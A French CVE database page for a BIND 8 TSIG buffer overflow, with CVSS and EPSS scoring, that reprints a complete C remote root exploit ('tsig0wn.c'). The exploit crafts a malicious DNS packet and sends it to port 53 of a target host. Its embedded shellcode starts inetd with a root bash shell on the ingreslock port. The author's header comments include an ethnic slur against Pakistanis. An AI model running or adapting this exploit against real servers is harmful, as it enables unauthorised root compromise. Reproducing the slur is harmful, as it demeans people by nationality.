CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges.
Informations du CVE
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
11%
–
–
2022-04-03
–
–
11%
–
–
2022-05-22
–
–
11%
–
–
2023-03-12
–
–
–
2.83%
–
2023-10-15
–
–
–
2.83%
–
2024-02-11
–
–
–
18.93%
–
2024-06-02
–
–
–
18.93%
–
2024-12-22
–
–
–
7.65%
–
2025-01-19
–
–
–
7.65%
–
2025-03-18
–
–
–
–
54.97%
2025-03-30
–
–
–
–
57.87%
2025-04-22
–
–
–
–
45.43%
2025-04-22
–
–
–
–
45.43,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2001-02-28 23h00 +00:00 Auteur : Gneisenau EDB Vérifié : Yes
/*
* tsig0wn.c
* Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau
* gneisenau@berlin.com
* The author is not and will not be held responsible for the action of
* other people using this code.
* provided for informational purposes only
* since a greetz section is de rigeur
* greets to my luv scharnie, sheib, darkx, famzah, brainstorm, ghQst, robbot, ......
* a special fuck to all pakis including those idiots from GForce, etc....
* but then pakistan is one big village comprising exclusively of prize idiots
* tabstop set at 3
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <netdb.h>
#include <errno.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
/*
* This shellcode sux. cant ever get around to coding another one.
*/
char shellcode[] = {
0xeb,0x3b,0x5e,0x31,0xc0,0x31,0xdb,0xb0,0xa0,0x89,
0x34,0x06,0x8d,0x4e,0x07,0x88,0x19,0x41,0xb0,0xa4,
0x89,0x0c,0x06,0x8d,0x4e,0x0a,0x88,0x19,0x41,0xb0,
0xa8,0x89,0x0c,0x06,0x31,0xd2,0xb0,0xac,0x89,0x14,
0x06,0x89,0xf3,0x89,0xf1,0xb0,0xa0,0x01,0xc1,0xb0,
0x0b,0xcd,0x80,0x31,0xc0,0xb0,0x01,0x31,0xdb,0xcd,
0x80,0xe8,0xc0,0xff,0xff,0xff,0x2f,0x62,0x69,0x6e,
0x2f,0x73,0x68,0xff,0x2d,0x63,0xff,
0x2f,0x62,0x69,0x6e,0x2f,0x65,0x63,0x68,0x6f,0x20,0x27,0x69,
0x6e,0x67,0x72,0x65,0x73,0x6c,0x6f,0x63,0x6b,0x20,0x73,0x74,
0x72,0x65,0x61,0x6d,0x20,0x74,0x63,0x70,0x20,0x6e,0x6f,0x77,
0x61,0x69,0x74,0x20,0x72,0x6f,0x6f,0x74,0x20,0x2f,0x62,0x69,
0x6e,0x2f,0x62,0x61,0x73,0x68,0x20,0x62,0x61,0x73,0x68,0x20,
0x20,0x2d,0x69,0x27,0x3e,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69,
0x6e,0x65,0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x3b,0x20,0x2f,
0x75,0x73,0x72,0x2f,0x73,0x62,0x69,0x6e,0x2f,0x69,0x6e,0x65,
0x74,0x64,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69,0x6e,0x65,
0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x00,
};
#define NS_T_TSIG 250
#define SHELLCODE_OFFSET 13
#define DUMMY_ARG_OFFSET 176
#define ENUM_FILE 1 //eventlib_p.h line 141
struct {
char *system_name;
unsigned int buffer_start; /* the address where out buffer starts in memory */
unsigned int frame_pointer; /* content of the frame pointer */
int garbage_len; /* length of the garbage in which we will embed ebp|eip */
} system[] = {
{ "Test value 1", 0xbffff640, 0xbffff868, 326, },
{ "Test value 2", 0xbffff5f0, 0xbffff700, 326, },
{ "Slackware 7.0", 0xbffff590, 0xbffff7e8, 326, },
{ NULL, 0x0, 0x0, },
};
void usage (void);
void encode_dns_name (char *, int, int);
int
main (int argc, char *argv[])
{
char query[PACKETSZ]; // construct our query packet here
char *query_ptr; // pointer to walk the query buffer
HEADER *hdr_ptr; // pointer to the header part of the query buffer
int arg;
unsigned int buffer_start,
frame_pointer, // value the frame pointer will have
shellcode_addr; // address our shellcode will have in the named buffer calculated from buffer_start
int index;
char *target_name;
struct hostent *target_host;
struct sockaddr_in target;
int sockfd;
if (argc < 2)
usage ();
while ((arg = getopt (argc, argv, "b:f:s:")) != -1) {
switch (arg){
case 'b': sscanf (optarg, "%x", &buffer_start);
break;
case 'f': sscanf (optarg, "%x", &frame_pointer);
break;
case 's': index = atoi (optarg) - 1;
buffer_start = system[index].buffer_start;
frame_pointer = system[index].frame_pointer;
break;
default : usage ();
}
}
if (!(target_name = argv[optind])){
fprintf (stderr, "tsig0wn: abysmal m0r0n error\n");
exit (1);
}
/*
* Form a header.
*/
memset (query, 0, PACKETSZ);
// cud blow up on other architectures not as liberal as x86. an union like in the bind sources is the correct way to go.
hdr_ptr = (HEADER *)query;
hdr_ptr->id = htons (0x1234);
hdr_ptr->qr = 0;
hdr_ptr->opcode = 0;
hdr_ptr->qdcount = htons (2);
hdr_ptr->arcount = htons (1);
/*
* Form a query after the header where we put in the shellcode
*/
query_ptr = (char *) (hdr_ptr + 1);
memcpy (query_ptr, shellcode, strlen (shellcode)+1);
query_ptr += strlen (shellcode) + 1;
PUTSHORT (T_A, query_ptr);
PUTSHORT (C_IN, query_ptr);
/*
* we form another header here that contains garbage with embedded stuff
* i cud have put this in the same header as the shellcode and have the
* shellcode nullify. (shrug)
*/
{
char *tmp;
unsigned long dummy_argument = buffer_start+DUMMY_ARG_OFFSET;
frame_pointer &= 0xffffff00; // zero out the LSB like the overflow in ns_sign will do
// this will make layout a domain name for the second query, within which
// we will embed our ebp | eip
encode_dns_name (query_ptr, system[index].garbage_len, (frame_pointer - buffer_start) - (query_ptr - query));
query_ptr += system[index].garbage_len;
shellcode_addr = buffer_start + SHELLCODE_OFFSET;
printf ("buffer starts at address = 0x%x\n", buffer_start);
printf ("saved frame pointer after overwrite = 0x%x\n", frame_pointer);
printf ("shellcode will reside at address = 0x%x\n", shellcode_addr);
printf ("dummy argument will reside at address = 0x%x\n", dummy_argument);
// put in the type member of evEvent_p. File is what we need
tmp = query + DUMMY_ARG_OFFSET;
tmp[0] = ENUM_FILE;
tmp[1] = ENUM_FILE >> 8;
tmp[2] = ENUM_FILE >> 16;
tmp[3] = ENUM_FILE >> 24;
// embed the addresses. These will be interpreted as ebp and eip.
// we put the address where our shellcode will be situated twice.
// we overflow the saved frame pointer of datagram_read(). when the
// function returns to __evDispatch() it calls __evDrop().
// because we have shifted the frame pointer and thus __evDispatch()
// notion of the stack we also provide two pointers as arguments to
// __evDispatch. These pointers point to the start of this query header
// name, within which __evDrop will look for evEvent_p->type. we set
// type to be of type 'file' above which causes it to break and execute
// FREE() which in turn calls free().
tmp = query + (frame_pointer - buffer_start); // advance the ptr to the place where we put in our ebp|eip
tmp[0] = shellcode_addr;
tmp[1] = shellcode_addr >> 8;
tmp[2] = shellcode_addr >> 16;
tmp[3] = shellcode_addr >> 24;
tmp[4] = shellcode_addr;
tmp[5] = shellcode_addr >> 8;
tmp[6] = shellcode_addr >> 16;
tmp[7] = shellcode_addr >> 24;
tmp[8] = dummy_argument;
tmp[9] = dummy_argument >> 8;
tmp[10] = dummy_argument >> 16;
tmp[11] = dummy_argument >> 24;
tmp[12] = dummy_argument;
tmp[13] = dummy_argument >> 8;
tmp[14] = dummy_argument >> 16;
tmp[15] = dummy_argument >> 24;
}
PUTSHORT (T_A, query_ptr);
PUTSHORT (C_IN, query_ptr);
/*
* Additional section containing T_SIG stuff
*/
// a name with only one char
memcpy (query_ptr, "\x01m\x00", 3);
query_ptr+=3;
PUTSHORT (NS_T_TSIG, query_ptr);
PUTSHORT (C_IN, query_ptr);
// these members wont be checked at all as find_key returns NULL on testing secretkey_info.
// PUTLONG (0, query_ptr);
// PUTSHORT (0, query_ptr);
/*
* Connect and deliver the payload
*/
if (!(target_host = gethostbyname (target_name))){
fprintf (stderr, "host name resolution error for %s: %s\n", target_name, hstrerror (h_errno));
exit (1);
}
if ((sockfd = socket (PF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0){
perror ("socket");
exit (1);
}
memset (&target, 0, sizeof (target));
target.sin_family = AF_INET;
target.sin_port = htons (53);
target.sin_addr.s_addr = ((struct in_addr *)target_host->h_addr_list[0])->s_addr;
if (connect (sockfd, &target, sizeof (target)) < 0){
perror ("connect");
exit (1);
}
if (send (sockfd, query, query_ptr - query, 0) < 0){
perror ("send");
exit (1);
}
exit (0);
}
void
usage (void)
{
int i;
fprintf (stderr, " tsig0wn\n");
fprintf (stderr, "Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau\n");
fprintf (stderr, "\nAvailable System Types\n");
for (i = 0; system[i].system_name; i++)
fprintf (stderr, "%d. %s\n", i+1, system[i].system_name);
fprintf (stderr, "\nUsage:\n");
fprintf (stderr, "tsig0wn [ -s system type ] target\nor\n");
fprintf (stderr, "tsig0wn [ -b buffer start address ] [ -f frame pointer content ] target\n");
exit (1);
}
/*
* a pretty convoluted function.
* len is the number of octects to fill in (including the length octect)
* embed_pos is the position where we need to embed this |len|ebp|eip|.
* Hopefully when we overwrite the saved ebp on the stack
* we expect it to point here and take the eip (which in turn points to our
* shellcode) from here. The challenge here is to lay out the octets so
* that it doesnt clash with embed_pos.
*/
void
encode_dns_name (char *buf, int len, int embed_pos)
{
int ctr = 0;
int adjusted = 0;
embed_pos -= 2; // our ebp | eip needs the length octet before it, so adjust for it now + 1
len--; // for the NULL octet at the end.
// sanity check
if (embed_pos >= len){
fprintf (stderr, "encode_dns_name: embed_pos >= len\n");
exit (1);
}
while (ctr < len)
// max 63 octets allowed + preceding 1 octet for length
if (ctr+64 <= len){ // enough space for another 63+1
if (ctr+64 <= embed_pos || adjusted){ // embed_pos not in between
*buf++ = 63;
memset (buf, 'g', 63); buf += 63;
ctr+=64;
}
else { // need to adjust cuz embed_pos in between
*buf++ = embed_pos-ctr-1;
memset (buf, 'o', embed_pos-ctr-1); buf += embed_pos-ctr-1;
ctr+= embed_pos-ctr;
adjusted++;
}
}
else {
if (len - ctr <= embed_pos || adjusted){ // only remaining len - ctr
*buf++ = len-ctr-1;
memset (buf, 'g', len-ctr-1);
ctr += 63; // we are quitting anyway after this. no need to update ctrs
}
else{
*buf++ = embed_pos-len-ctr-1;
memset (buf, 'o', embed_pos-len-ctr-1); buf += embed_pos-len-ctr-1;
ctr += embed_pos-len-ctr;
adjusted++;
}
}
*buf=0x00; // finish with a 0
}
// milw0rm.com [2001-03-01]